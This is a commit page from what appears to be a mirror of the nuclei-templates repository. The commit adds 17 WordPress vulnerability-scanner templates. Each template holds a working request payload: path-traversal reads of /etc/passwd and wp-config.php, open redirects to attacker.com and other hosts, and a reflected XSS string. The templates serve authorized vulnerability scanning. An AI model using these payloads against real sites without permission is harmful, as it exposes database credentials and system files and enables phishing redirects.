daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #3695 from DhiyaneshGeek/master 

17 New Wordpress Templates
patch-1
Prince Chaddha 2022-02-15 18:35:47 +05:30 committed by GitHub
parent 69f6c6606e 06b34a62f6
commit 7bf3ac584c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
17 changed files with 452 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

24
vulnerabilities/wordpress/candidate-application-lfi.yaml Normal file
View File

@ -0,0 +1,24 @@
id: candidate-application-lfi
info:
name: Candidate Application Form <= 1.3 - Unauthenticated Arbitrary File Download
author: dhiyaneshDK
severity: high
description: The code in downloadpdffile.php does not do any sanity checks, allowing a remote attacker to download sensitive system files.
reference: https://wpscan.com/vulnerability/446233e9-33b3-4024-9b7d-63f9bb1dafe0
tags: wordpress,wp-plugin,lfi,wp
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd'
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

29
vulnerabilities/wordpress/cherry-lfi.yaml Normal file
View File

@ -0,0 +1,29 @@
id: cherry-lfi
info:
name: Cherry Plugin < 1.2.7 - Unauthenticated Arbitrary File Upload and Download
author: dhiyaneshDK
severity: high
description: The cherry plugin WordPress plugin was affected by an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file.
reference:
- https://wpscan.com/vulnerability/90034817-dee7-40c9-80a2-1f1cd1d033ee
- https://support.alertlogic.com/hc/en-us/articles/115003048083-06-19-17-WordPress-CMS-Cherry-Plugin-Arbitrary-File-Upload-RCE
tags: wordpress,wp-plugin,lfi,wp
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DB_NAME"
- "DB_PASSWORD"
condition: and
- type: status
status:
- 200

27
vulnerabilities/wordpress/churchope-lfi.yaml Normal file
View File

@ -0,0 +1,27 @@
id: churchope-lfi
info:
name: ChurcHope Theme <= 2.1 - Local File Inclusion (LFI)
author: dhiyaneshDK
severity: high
description: The vulnerability is caused by improper filtration of user-supplied input passed via the 'file' HTTP GET parameter to the '/lib/downloadlink.php' script, which is publicly accessible.
reference: https://wpscan.com/vulnerability/3c5833bd-1fe0-4eba-97aa-7d3a0c8fda15
tags: wordpress,wp-theme,lfi,wp
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DB_NAME"
- "DB_PASSWORD"
condition: and
- type: status
status:
- 200

29
vulnerabilities/wordpress/db-backup-lfi.yaml Normal file
View File

@ -0,0 +1,29 @@
id: db-backup-lfi
info:
name: DB Backup <= 4.5 - Path Traversal File Access
author: dhiyaneshDK
severity: high
description: WordPress Plugin DB Backup is prone to a directory traversal vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin DB Backup version 4.5 is vulnerable; prior versions may also be affected.
reference:
- https://wpscan.com/vulnerability/d3f1e51e-5f44-4a15-97bc-5eefc3e77536
- https://www.exploit-db.com/exploits/35378
tags: wordpress,wp-plugin,lfi,wp
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DB_NAME"
- "DB_PASSWORD"
condition: and
- type: status
status:
- 200

43
vulnerabilities/wordpress/elementorpage-open-redirect.yaml Normal file
View File

@ -0,0 +1,43 @@
id: elementorpage-open-redirect
info:
name: The Plus Addons for Elementor Page Builder < 4.1.10 - Open Redirect
author: dhiyaneshDk
severity: medium
description: The plugin did not validate a redirect parameter on a specifically crafted URL before redirecting the user to it, leading to an Open Redirect issue.
reference: https://wpscan.com/vulnerability/fd4352ad-dae0-4404-94d1-11083cb1f44d
tags: wordpress,redirect,wp-plugin,elementor,wp
requests:
- raw:
- |
GET /?author=1 HTTP/1.1
Host: {{Hostname}}
- |
GET /wp-login.php?action=theplusrp&key=&redirecturl=http://attacker.com&forgoturl=http://attacker.com&login={{username}} HTTP/1.1
Host: {{Hostname}}
redirects: true
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
extractors:
- type: regex
part: body
name: username
internal: true
group: 1
regex:
- 'Author:(?:[A-Za-z0-9 -\_="]+)?<span(?:[A-Za-z0-9 -\_="]+)?>([A-Za-z0-9]+)<\/span>'
- type: regex
part: header
name: username
internal: true
group: 1
regex:
- 'ion: https:\/\/[a-z0-9.]+\/author\/([a-z]+)\/'

20
vulnerabilities/wordpress/eventtickets-open-redirect.yaml Normal file
View File

@ -0,0 +1,20 @@
id: eventtickets-open-redirect
info:
name: Event Tickets < 5.2.2 - Open Redirect
author: dhiyaneshDk
severity: low
description: The plugin does not validate the tribe_tickets_redirect_to parameter before redirecting the user to the given value, leading to an arbitrary redirect issue
reference: https://wpscan.com/vulnerability/80b0682e-2c3b-441b-9628-6462368e5fc7
tags: wordpress,redirect,wp-plugin,eventtickets,wp
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://example.com"
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

28
vulnerabilities/wordpress/hb-audio-lfi.yaml Normal file
View File

@ -0,0 +1,28 @@
id: hb-audio-lfi
info:
name: Wordpress Plugin HB Audio Gallery Lite - Arbitrary File Download
author: dhiyaneshDK
severity: high
reference: https://packetstormsecurity.com/files/136340/WordPress-HB-Audio-Gallery-Lite-1.0.0-Arbitrary-File-Download.html
metadata:
google-dork: inurl:/wp-content/plugins/hb-audio-gallery-lite
tags: wordpress,wp-plugin,lfi,wp
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DB_NAME"
- "DB_PASSWORD"
condition: and
- type: status
status:
- 200

27
vulnerabilities/wordpress/hide-security-enhancer-lfi.yaml Normal file
View File

@ -0,0 +1,27 @@
id: hide-security-enhancer-lfi
info:
name: WP Hide Security Enhancer 1.3.9.2 - Arbitrary File Download Vulnerability
author: dhiyaneshDK
severity: high
description: WP Hide Security Enhancer version 1.3.9.2 or less is victim of an Arbitrary File Download vulnerability. This allows any visitor to download any file in our installation
reference: https://secupress.me/blog/arbitrary-file-download-vulnerability-in-wp-hide-security-enhancer-1-3-9-2/
tags: wordpress,wp-plugin,lfi,wp
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DB_NAME"
- "DB_PASSWORD"
condition: and
- type: status
status:
- 200

24
vulnerabilities/wordpress/music-store-open-redirect.yaml Normal file
View File

@ -0,0 +1,24 @@
id: music-store-open-redirect
info:
name: Music Store <= 1.0.14 - Referer Header Open Redirect
author: dhiyaneshDk
severity: medium
description: The Music Store WordPress eCommerce WordPress plugin was affected by a Referer Header Open Redirect security vulnerability.
reference:
- https://wpscan.com/vulnerability/d73f6575-eb86-480c-bde1-f8765870cdd1
- https://seclists.org/fulldisclosure/2015/Jul/113
tags: wordpress,redirect,wp-plugin,musicstore,wp
requests:
- raw:
- |
GET /wp-content/plugins/music-store/ms-core/ms-submit.php HTTP/1.1
Host: {{Hostname}}
Referer: https://example.com
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

20
vulnerabilities/wordpress/newsletter-open-redirect.yaml Normal file
View File

@ -0,0 +1,20 @@
id: newsletter-open-redirect
info:
name: Newsletter Manager < 1.5 - Unauthenticated Open Redirect
author: dhiyaneshDk
severity: medium
description: The plugin used base64 encoded user input in the appurl parameter without validation, to redirect users using the header() PHP function, leading to an open redirect issue.
reference: https://wpscan.com/vulnerability/847b3878-da9e-47d6-bc65-3cfd2b3dc1c1
tags: wordpress,redirect,wp-plugin,newsletter,wp
requests:
- method: GET
path:
- "{{BaseURL}}/?wp_nlm=confirmation&appurl=aHR0cDovL3d3dy5nb29nbGUuY29t"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)google\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
part: header

30
vulnerabilities/wordpress/ninjaform-open-redirect.yaml Normal file
View File

@ -0,0 +1,30 @@
id: ninjaform-open-redirect
info:
name: Ninja Forms < 3.4.34 - Administrator Open Redirect
author: dhiyaneshDk
severity: medium
description: The wp_ajax_nf_oauth_connect AJAX action was vulnerable to open redirect due to the use of a user supplied redirect parameter and no protection in place.
reference: https://wpscan.com/vulnerability/6147acf5-e43f-47e6-ab56-c9c8be584818
tags: wordpress,redirect,wp-plugin,ninjaform,wp,authenticated
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin-ajax.php?client_id=1&redirect=https://google.com&action=nf_oauth_connect HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)google\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

22
vulnerabilities/wordpress/noptin-open-redirect.yaml Normal file
View File

@ -0,0 +1,22 @@
id: noptin-open-redirect
info:
name: Noptin < 1.6.5 - Open Redirect
author: dhiyaneshDk
severity: low
description: The plugin does not validate the to parameter before redirecting the user to its given value, leading to an open redirect issue
reference:
- https://wpscan.com/vulnerability/c2d2384c-41b9-4aaf-b918-c1cfda58af5c
- https://plugins.trac.wordpress.org/changeset/2639592
tags: wordpress,redirect,wp-plugin,noptin,wp
requests:
- method: GET
path:
- "{{BaseURL}}/?noptin_ns=email_click&to=https://example.com"
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' #https://regex101.com/r/ZDYhFh/1

29
vulnerabilities/wordpress/shortcode-lfi.yaml Normal file
View File

@ -0,0 +1,29 @@
id: shortcode-lfi
info:
name: WordPress Plugin Download Shortcode Local File Inclusion (0.2.3)
author: dhiyaneshDK
severity: high
description: WordPress Plugin Download Shortcode is prone to a local file inclusion vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin Download Shortcode version 0.2.3 is vulnerable; prior versions may also be affected.
reference: https://packetstormsecurity.com/files/128024/WordPress-ShortCode-1.1-Local-File-Inclusion.html
metadata:
google-dork: inurl:wp/wp-content/force-download.php
tags: wordpress,wp-plugin,lfi,shortcode,wp
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/force-download.php?file=../wp-config.php'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DB_NAME"
- "DB_PASSWORD"
condition: and
- type: status
status:
- 200

24
vulnerabilities/wordpress/simple-image-manipulator-lfi.yaml Normal file
View File

@ -0,0 +1,24 @@
id: simple-image-manipulator-lfi
info:
name: Simple Image Manipulator v1.0 - Remote file download
author: dhiyaneshDK
severity: high
description: In ./simple-image-manipulator/controller/download.php no checks are made to authenticate user or sanitize input when determining file location.
reference: https://packetstormsecurity.com/files/132962/WordPress-Simple-Image-Manipulator-1.0-File-Download.html
tags: wordpress,wp-plugin,lfi,wp
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd'
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

26
vulnerabilities/wordpress/sniplets-lfi.yaml Normal file
View File

@ -0,0 +1,26 @@
id: sniplets-lfi
info:
name: Wordpress Plugin Sniplets 1.1.2 - LFI
author: dhiyaneshDK
severity: high
reference: https://www.exploit-db.com/exploits/5194
tags: wordpress,wp-plugin,lfi,wp
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DB_NAME"
- "DB_PASSWORD"
condition: and
- type: status
status:
- 200

30
vulnerabilities/wordpress/sniplets-xss.yaml Normal file
View File

@ -0,0 +1,30 @@
id: sniplets-xss
info:
name: Wordpress Plugin Sniplets - XSS
author: dhiyaneshDK
severity: medium
description: Cross-site scripting (XSS) on Wordpress Plugin Sniplets
reference: https://www.exploit-db.com/exploits/5194
tags: xss,wordpress,wp-plugin,wp
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

20
vulnerabilities/wordpress/webp-coverter-open-redirect.yaml Normal file
View File

@ -0,0 +1,20 @@
id: webp-coverter-open-redirect
info:
name: WebP Converter for Media < 4.0.3 - Unauthenticated Open redirect
author: dhiyaneshDk
severity: medium
description: The plugin contains a file (passthru.php) which does not validate the src parameter before redirecting the user to it, leading to an Open Redirect issue.
reference: https://wpscan.com/vulnerability/f3c0a155-9563-4533-97d4-03b9bac83164
tags: wordpress,redirect,wp-plugin,webpconverter,wp
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://example.com"
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1